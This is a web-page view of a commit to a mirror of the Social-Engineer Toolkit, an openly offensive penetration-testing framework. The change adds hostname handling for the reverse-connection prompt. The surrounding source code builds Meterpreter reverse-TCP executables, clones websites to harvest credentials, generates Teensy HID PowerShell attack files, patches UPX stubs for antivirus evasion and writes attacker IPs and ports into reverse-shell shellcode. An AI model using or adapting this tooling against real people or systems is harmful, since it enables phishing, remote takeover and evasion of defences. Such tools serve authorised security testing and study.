Mirrors/social-engineer-toolkit
2
0
Fork 0
mirror of https://github.com/trustedsec/social-engineer-toolkit synced 2024-11-27 06:50:18 +00:00
Code Issues Projects Releases Packages Wiki Activity

Added better handling around hostnames and IP addresses

Browse source
This commit is contained in:
trustedsec 2013-01-19 09:49:36 -05:00
parent 99ed445be4
commit 54e8616e0c
3 changed files with 67 additions and 56 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
readme/CHANGES
View file

@ -4,6 +4,8 @@ version 4.3.10
* Fixed a bug that would cause README to error out (thanks Chris Barrow).
* Added the ability to use hostnames with payloads including pyinjector and multiinjector
* Added better handling of hostnames when not specifying an IP address
* Added better handling around if an IP address is typed in wrong on web cloning
~~~~~~~~~~~~~~~~
version 4.3.9

14
src/core/set.py
View file

@ -307,8 +307,18 @@ try:
if nat_or_fwd == "NO":
print_info("Enter the IP address of your interface IP or if your using an external IP, what")
print_info("will be used for the connection back and to house the web server (your interface address)")
ipaddr = raw_input(setprompt(["2"], "IP address for the reverse connection"))
ipaddr = raw_input(setprompt(["2"], "IP address or hostname for the reverse connection"))
# here we check if they are using a hostname else we loop through until they have a legit one
if validate_ip(ipaddr) == False:
while 1:
choice = raw_input(setprompt(["2"], "This is not an IP address. Are you using a hostname? [y/n] "))
if choice == "" or choice.lower() == "y":
print_status("Roger that. Using hostnames moving forward..")
break
else:
ipaddr = raw_input(setprompt(["2"], "IP address for the reverse connection"))
if validate_ip(ipaddr) == True: break
if attack_vector == "harvester" or attack_vector == "tabnabbing" or attack_vector == "webjacking":
print_info("This option is used for what IP the server will POST to.")
print_info("If you're using an external IP, use your external IP for this")

107
src/core/setcore.py
View file

@ -2,7 +2,7 @@
##############################################
#
# Centralized classes, work in progress
#
#
##############################################
import re
import sys
@ -72,7 +72,7 @@ if check_os() == "posix":
self.backCyan = ''
self.backWhite = ''
self.DARKCYAN = ''
# if we are windows or something like that then define colors as nothing
else:
class bcolors:
@ -115,7 +115,7 @@ else:
self.backWhite = ''
self.DARKCYAN = ''
# this will be the home for the set menus
# this will be the home for the set menus
def setprompt(category, text):
# if no special prompt and no text, return plain prompt
if category == '0' and text == "":
@ -148,7 +148,7 @@ def setprompt(category, text):
def yesno_prompt(category,text):
valid_response = False
while not valid_response:
while not valid_response:
response = raw_input(setprompt(category,text))
response = str.lower(response)
if response == "no" or response == "n":
@ -215,7 +215,7 @@ def print_error(message):
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
def get_version():
define_version = '4.3.10'
define_version = '4.3.9'
return define_version
class create_menu:
@ -225,10 +225,10 @@ class create_menu:
print text
#print "\nType 'help' for information on this module\n"
for i, option in enumerate(menu):
menunum = i + 1
# Check to see if this line has the 'return to main menu' code
match = re.search("0D", option)
match = re.search("0D", option)
# If it's not the return to menu line:
if not match:
if menunum < 10:
@ -246,13 +246,12 @@ def validate_ip(address):
debug_msg("setcore","this is a valid IP address",5)
return True
else:
print_error("(hint) there seems to be some octets missing...")
print_error("This is not a valid IP address...")
raise socket.error
else:
raise socket_error
except socket.error:
print_error("Invalid address format. Please enter a valid IPv4 address")
return False
#
@ -410,7 +409,7 @@ def check_beautifulsoup():
subprocess.Popen("rm -rf BeautifulSoup-*", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
print_status("Finished... Relaunch SET, if it doesn't work for you, install manually.")
sys.exit(1)
if answer == "NO":
sys.exit()
else:
@ -455,7 +454,7 @@ def check_mssql():
else:
print_error("ERROR:Invalid response, exiting the Social-Engineer Toolkit...")
sys.exit(1)
#
#
# cleanup old or stale files
#
def cleanup_routine():
@ -573,7 +572,7 @@ def site_cloner(website, exportpath, *args):
# inherit the AUTO_DETECT=ON or OFF configuration.
#
# usage: metasploit_reverse_tcp_exe(portnumber)
#
#
def meterpreter_reverse_tcp_exe(port):
ipaddr = grab_ipaddress()
@ -604,7 +603,7 @@ def meterpreter_reverse_tcp_exe(port):
random_value = generate_random_string(5, 10)
# copy the created executable to program_junk
print_status("Executable created under src/program_junk/%s.exe" % (random_value))
subprocess.Popen("cp src/html/msf.exe src/program_junk/%s.exe" % (random_value), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("cp src/html/msf.exe src/program_junk/%s.exe" % (random_value), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
#
# Start a metasploit multi handler
#
@ -682,7 +681,7 @@ def java_applet_attack(website, port, directory):
filename = check_options("MSF.EXE=")
if check_options != 0:
#if os.path.isfile("src/program_junk/rand_gen"):
# move the file to the specified directory and filename
subprocess.Popen("cp src/html/msf.exe %s/%s" % (directory,filename), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
@ -719,7 +718,7 @@ def teensy_pde_generator(attack_method):
filewrite = file("reports/powershell_down.pde", "w")
teensy_string = ("Successfully generated Teensy HID Attack Vector under reports/powershell_down.pde")
# if we are doing the attack vector teensy
# if we are doing the attack vector teensy
if attack_method == "powershell_reverse":
# specify the filename
filename = file("src/teensy/powershell_reverse.pde", "r")
@ -733,7 +732,7 @@ def teensy_pde_generator(attack_method):
filewrite = file("reports/java_applet.pde", "w")
teensy_string = ("Successfully generated Teensy HID Attack Vector under reports/java_applet.pde")
# if we are doing the attack vector teensy
# if we are doing the attack vector teensy
if attack_method == "wscript":
# specify the filename
filename = file("src/teensy/wscript.pde", "r")
@ -758,7 +757,7 @@ def teensy_pde_generator(attack_method):
print_status(teensy_string)
#
# Expand the filesystem windows directory
#
#
def windows_root():
return os.environ['WINDIR']
@ -768,7 +767,7 @@ def windows_root():
#
def log(error):
# open log file only if directory is present (may be out of directory for some reason)
if not os.path.isfile("%s/src/logs/set_logfile.log" % (definepath)):
if not os.path.isfile("%s/src/logs/set_logfile.log" % (definepath)):
filewrite = file("%s/src/logs/set_logfile.log" % (definepath), "w")
filewrite.write("")
filewrite.close()
@ -792,7 +791,7 @@ def upx(path_to_file):
match = re.search("UPX_PATH=", line)
if match:
upx_path = line.replace("UPX_PATH=", "")
# if it isn't there then bomb out
if not os.path.isfile(upx_path):
print_warning("UPX was not detected. Try configuring the set_config again.")
@ -804,14 +803,14 @@ def upx(path_to_file):
subprocess.Popen("%s -9 -q -o src/program_junk/temp.binary %s" % (upx_path, path_to_file), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# move it over the old file
subprocess.Popen("mv src/program_junk/temp.binary %s" % (path_to_file), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# random string
random_string = generate_random_string(3,3).upper()
# 4 upx replace - we replace 4 upx open the file
fileopen = file(path_to_file, "rb")
filewrite = file("src/program_junk/temp.binary", "wb")
# read the file open for data
data = fileopen.read()
# replace UPX stub makes better evasion for A/V
@ -831,11 +830,11 @@ def show_banner(define_version,graphic):
show_graphic()
else:
os.system("clear")
print bcolors.BLUE + """
[---] The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""") [---]
[---] The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""") [---]
[---] Created by:""" + bcolors.RED+""" David Kennedy """+bcolors.BLUE+"""("""+bcolors.YELLOW+"""ReL1K"""+bcolors.BLUE+""") [---]
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
[---] Codename: '""" + bcolors.YELLOW + """Turbulence""" + bcolors.BLUE + """' [---]
[---] Follow us on Twitter: """ + bcolors.PURPLE+ """@trustedsec""" + bcolors.BLUE+""" [---]
[---] Follow me on Twitter: """ + bcolors.PURPLE+ """@dave_rel1k""" + bcolors.BLUE+""" [---]
@ -843,7 +842,7 @@ def show_banner(define_version,graphic):
""" + bcolors.GREEN+""" Welcome to the Social-Engineer Toolkit (SET). The one
stop shop for all of your social-engineering needs.
"""
"""
print bcolors.BLUE + """ Join us on irc.freenode.net in channel #setoolkit\n""" + bcolors.ENDC
print bcolors.BOLD + """ The Social-Engineer Toolkit is a product of TrustedSec.\n\n Visit: """ + bcolors.GREEN + """https://www.trustedsec.com\n""" + bcolors.ENDC
@ -853,28 +852,28 @@ def show_graphic():
print bcolors.YELLOW + r"""
.--. .--. .-----.
: .--': .--'`-. .-'
`. `. : `; : :
_`, :: :__ : :
`. `. : `; : :
_`, :: :__ : :
`.__.'`.__.' :_; """ + bcolors.ENDC
return
if menu == 3:
print bcolors.GREEN + r"""
_______________________________
/ _____/\_ _____/\__ ___/
\_____ \ | __)_ | |
/ \ | \ | |
/_______ //_______ / |____|
\_____ \ | __)_ | |
/ \ | \ | |
/_______ //_______ / |____|
\/ \/ """ + bcolors.ENDC
return
if menu == 4:
print bcolors.BLUE + r"""
print bcolors.BLUE + r"""
:::=== :::===== :::====
::: ::: :::====
===== ====== ===
=== === ===
====== ======== ===
===== ====== ===
=== === ===
====== ======== ===
""" + bcolors.ENDC
if menu == 5:
@ -890,21 +889,21 @@ def show_graphic():
if menu == 6:
print bcolors.PURPLE + r'''
.M"""bgd `7MM"""YMM MMP""MM""YMM
,MI "Y MM `7 P' MM `7
`MMb. MM d MM
`YMMNq. MMmmMM MM
. `MM MM Y , MM
Mb dM MM ,M MM
.M"""bgd `7MM"""YMM MMP""MM""YMM
,MI "Y MM `7 P' MM `7
`MMb. MM d MM
`YMMNq. MMmmMM MM
. `MM MM Y , MM
Mb dM MM ,M MM
P"Ybmmd" .JMMmmmmMMM .JMML.''' + bcolors.ENDC
return
if menu == 7:
print bcolors.YELLOW + r"""
print bcolors.YELLOW + r"""
________________________
__ ___/__ ____/__ __/
_____ \__ __/ __ /
____/ /_ /___ _ /
_____ \__ __/ __ /
____/ /_ /___ _ /
/____/ /_____/ /_/ """ + bcolors.ENDC
return
@ -962,7 +961,7 @@ def set_check():
for line in fileopen:
match = re.search("SET_INTERACTIVE_SHELL=OFF", line)
# if we turned it off then we return a true else return false
if match:
if match:
return True
match1 = re.search("SET_INTERACTIVE_SHELL=ON", line)
# return false otherwise
@ -1019,7 +1018,7 @@ def check_length(choice,max):
choice = int(choice)
# if everythings good return the right choice
return choice
# oops, not a integer
# oops, not a integer
except Exception:
counter = 1
@ -1086,7 +1085,7 @@ def is_valid_ipv6(ip):
| (?<!:) #
| (?<=:) (?<!::) : #
) # OR
| # A v4 address with NO leading zeros
| # A v4 address with NO leading zeros
(?:25[0-4]|2[0-4]\d|1\d\d|[1-9]?\d)
(?: \.
(?:25[0-4]|2[0-4]\d|1\d\d|[1-9]?\d)
@ -1131,7 +1130,7 @@ def copyfolder(sourcePath, destPath):
#figure out where we're going
dest = destPath + root.replace(sourcePath, '')
#if we're in a directory that doesn't exist in the destination folder
#then create a new folder
if not os.path.isdir(dest):
@ -1155,7 +1154,7 @@ def copyfolder(sourcePath, destPath):
# this routine will be used to check config options within the set.options
def check_options(option):
# open the directory
trigger = 0
trigger = 0
fileopen = file("%s/src/program_junk/set.options" % (definepath), "r").readlines()
for line in fileopen:
match = re.search(option, line)
@ -1163,7 +1162,7 @@ def check_options(option):
line = line.rstrip()
line = line.replace('"', "")
line = line.split("=")
return line[1]
return line[1]
trigger = 1
if trigger == 0: return trigger
@ -1178,7 +1177,7 @@ def update_options(option):
filewrite = file("%s/src/program_junk/set.options" % (definepath), "a")
filewrite.write(option + "\n")
filewrite.close()
# python socket listener
def socket_listener(port):
port = int(port) # needed integer for port
@ -1330,7 +1329,7 @@ def shellcode_replace(ipaddr, port, shellcode):
# getting everything into the right format
if len(port) > 4:
port = "\\x00" + port
# if we are using a low number like 21, 23, etc.
# if we are using a low number like 21, 23, etc.
if len(port) == 4:
port = "\\x00\\x00" + port
shellcode = shellcode.replace(r"\x00\x01\xbb", port)